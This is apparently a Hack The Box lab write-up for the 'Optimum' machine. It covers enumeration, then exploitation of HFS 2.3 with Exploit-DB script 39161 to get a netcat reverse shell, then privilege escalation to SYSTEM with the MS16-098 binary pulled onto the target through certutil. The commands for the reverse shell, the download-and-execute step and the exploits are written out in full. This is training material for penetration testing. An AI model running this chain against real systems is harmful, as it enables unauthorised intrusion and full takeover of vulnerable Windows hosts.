Enumeration
The initial enumeration phase established that the target, 10.129.89.198, is a Windows machine based on the TTL=127 from the ping command. A full port scan using nmap revealed only port 80 open, running the HttpFileServer httpd 2.3 service. Further detailed scans and whatweb confirmed the presence of HFS 2.3, which strongly suggested a specific attack vector could be available, narrowing down the focus for the next phase.
# Check connection & ttl=127 which tell us it's a Windows machine
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ ping -c 1 10.129.89.198
64 bytes from 10.129.89.198: icmp_seq=1 ttl=127 time=97.2 ms
# [-p-] Scan all ports
# [--open] Only show the open ports
# [-n] Do not resolve DNS to improve the time of the scan
# [-sS] SYN scan. Do not complete TCP connections
# [-Pn] Skips the initial host check
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ sudo nmap -p- --open -n -sS -Pn --min-rate=5000 10.129.89.198
PORT STATE SERVICE
80/tcp open http
# [-p80] Scan only port 80
# [-sCV] Service version detection & Run defaults scripts
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ sudo nmap -p80 -sCV 10.129.89.198 -oN target
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
# Get information about the webpage techonologies
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ whatweb http://10.129.89.198
[200 OK] Cookies[HFS_SID], Country[RESERVED][ZZ], HTTPServer[HFS 2.3], HttpFileServer, IP[10.129.89.198], JQuery[1.4.4], Script[text/javascript], Title[HFS /]Exploitation
The exploitation phase began by using searchsploit to find known vulnerabilities for HFS 2.3. The search yielded several options, with the Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) exploit (EDB ID 39161) being chosen. This exploit requires hosting a copy of Netcat for Windows (renamed to nc.exe) on a local HTTP server. After setting up a Python HTTP server on port 80 and a Netcat listener on port 443, the Python 2 exploit script was executed. Although it initially failed, a second run successfully executed the remote command, downloading and running nc.exe on the target to establish a reverse shell, granting access as the low-privileged user kostas.
# Searching exploits for HFS v2.3
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ searchsploit HFS 2.3
----------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------- ---------------------------------
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3) | windows/remote/49584.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
----------------------------------------------------------------------------------------------------------- ---------------------------------
# [-x] Look the source code of the script
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ searchsploit -x windows/remote/39161.py
# Notes from the creator:
# Usage : python Exploit.py <Target IP address> <Target Port Number>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
# [-m] Copy the script to the currect directory
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ searchsploit -m windows/remote/39161.py
Exploit: Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
URL: https://www.exploit-db.com/exploits/39161
Path: /usr/share/exploitdb/exploits/windows/remote/39161.py
Codes: CVE-2014-6287, OSVDB-111386
Verified: True
File Type: Python script, ASCII text executable, with very long lines (540)
Copied to: /home/kali/htb/optimum/39161.py
# Change the local IP address value in the source code
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ nano 39161.py # ip_addr = "10.10.14.84"
# Download netcat for Windows from the nmap website
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip
# [-j] Junk paths. Do not create a new directory to extract the files
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ unzip -j ncat-portable-5.59BETA1.zip
# Extracted files are in the working directory
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ ls -l
-rwxr-xr-x 1 kali kali 1667584 Jun 30 2011 ncat.exe
-rw-rw-r-- 1 kali kali 666933 Jun 30 2011 ncat-portable-5.59BETA1.zip
-rw-rw-r-- 1 kali kali 640 Jun 30 2011 README
# Rename the file because the script will look for "nc.exe"
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ mv ncat.exe nc.exe
# Create a simple http server with python
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
# Listen to the reverse shell in port 443
# [-l] Listen mode. Waiting for an incoming connection
# [-v] Output verbosity
# [-n] Disables DNS resolution
# [-p] Specifies the port number to listen on or connect to
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ nc -lvnp 443
# Run the script using python2
# python2 39161.py <target_ip> <target_port>
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python2 39161.py 10.129.89.198 80
# The script retrieved the netcat file from the server but did not create a shell to my listener. Let's run it again
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python2 39161.py 10.129.89.198 80
# We got access with the user kostas
C:\Users\kostas\Desktop>whoami
optimum\kostas
# The user flag is in "C:\Users\kostas\Desktop\user.txt"
C:\Users\kostas\Desktop>type user.txt
66*****************************ffPrivilege Escalation
For privilege escalation, the systeminfo command was executed on the target, and its output was saved locally. This data was then fed into the Windows-Exploit-Suggester-python3 tool, which compares system patch levels against a database of known vulnerabilities. The tool suggested the exploit for MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) (EDB ID 41020). The associated binary exploit, 41020.exe, was downloaded from Exploit-DB’s binary repository, transferred to the target machine via a Python HTTP server and certutil, and then executed. Running the exploit successfully escalated privileges from the kostas user to NT AUTHORITY\SYSTEM, allowing for the retrieval of the final root flag.
# Copy all the information retrieved from the machine to a file in your machine like "systeminfo.txt"
C:\Users\kostas\Desktop>systeminfo
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ nano systeminfo.txt
# Cloning the windows-exploit-suggester repository for python3
# Original repo: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ git clone https://github.com/Pwnistry/Windows-Exploit-Suggester-python3
# [-u] Update database
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 windows-exploit-suggester.py -u
[*] initiating winsploit version 3.4...
[+] writing to file 2025-10-23-mssb.xlsx
[*] done
# [-d] Database file
# [-i] Systeminfo file
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 windows-exploit-suggester.py -d 2025-10-23-mssb.xlsx -i systeminfo.txt
[*] initiating winsploit version 3.4...
[*] querying database file for potential vulnerabilities
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
...
...
...
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
# Download binary from exploitdb-bin-sploits for the exploit above
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe
# Create an http server with python to transfer the binary to the Windows Server machine
┌──(jquirozz㉿jquirozz.com)-[~/htb/optimum]
└─$ python3 -m http.server 80
C:\Users\kostas\Desktop>cd C:\Windows\Temp
C:\Windows\Temp>mkdir Privesc
C:\Windows\Temp>cd Privesc
# Getting the binary from the http server
# Command: certutil -f -urlcache -split http://<server_ip>/<server_file> <output_file_name>
# [-f] Force flag. Overwrite if the file already exists
# [-urlcache] Manipulating the URL cache, which includes the function to download files from a specified URL.
# [-split] This is a modifier for the "-urlcache" command that tells certutil to save the output file to disk
C:\Windows\Temp\Privesc>certutil -f -urlcache -split http://10.10.14.84/41020.exe exploit.exe
CertUtil: -URLCache command completed successfully.
# Run the exploit
C:\Windows\Temp\Privesc>exploit.exe
# We got Administrator access
C:\Windows\Temp\Privesc>whoami
nt authority\system
# Root flag in "C:\Users\Administrator\Desktop"
C:\Windows\Temp\Privesc>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
09*****************************e7